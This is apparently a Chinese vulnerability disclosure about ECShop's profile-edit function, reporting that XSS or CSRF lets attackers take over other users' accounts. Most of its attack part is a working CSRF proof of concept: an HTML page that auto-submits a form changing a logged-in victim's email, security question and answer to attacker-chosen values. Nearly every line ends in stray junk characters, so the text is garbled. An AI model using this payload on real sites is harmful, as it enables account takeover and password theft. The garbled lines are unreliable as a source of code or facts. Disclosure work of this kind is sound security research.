简要描述:, B9 T+ d* Z& W; R
ecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现+ [7 J: D9 O! @* o) C& T+ [
1 g- u1 D' ] E" O9 i- X2 [6 M
Demo For:http://www.wooyun.org/bug.php?action=view&id=395) S/ v9 t5 n$ \9 v2 Z
% ?) Q2 i. V0 i详细说明:& |7 P c4 m; }, t7 F
利用csrf和xss可以突破官方所说的“障碍”
E, @1 J5 y m/ \xss版本已经有人说明
" ~8 F; T7 P* Q# t这里给出csrf版本
2 ]' [7 w/ q) D8 v1 u+ b5 l* Y5 C2 L! Z7 R5 F+ P$ }
漏洞证明:
/ `6 K% ^: S& G2 P3 o<html>! a& H7 W6 _. X0 }! v( M
<body>, h! [& k0 w( ?1 ?; i
<form action="http://www.wooyun.org/ecshop/user.php" method="POST">
% S$ C. E2 V) N2 g1 I! X<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">
# ~6 ^% Q4 u9 t7 j' k6 B& J<INPUT TYPE="text" NAME="act" value="act_edit_profile">; t6 @* ]9 c; W& g
<INPUT TYPE="text" NAME="sel_question" value="ecshop">- Y* I7 ?, ^, W& G& g
<INPUT TYPE="text" NAME="passwd_answer" value="exploit">
2 m$ B3 f- p! r" W' h</body>) {" p2 |3 X! h5 L- v
<script>
( ?& C) n! l8 [, k- I! {8 Mdocument.forms[0].submit();! _5 a8 p5 t1 [9 }5 G
</script>/ R; R/ u1 X+ O" G5 v8 n
</html>, {# d' X* I! F
构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失" }* {! w+ }" A. I
$ \) ? {. V9 v9 g' D: f% w9 b; a0 b
|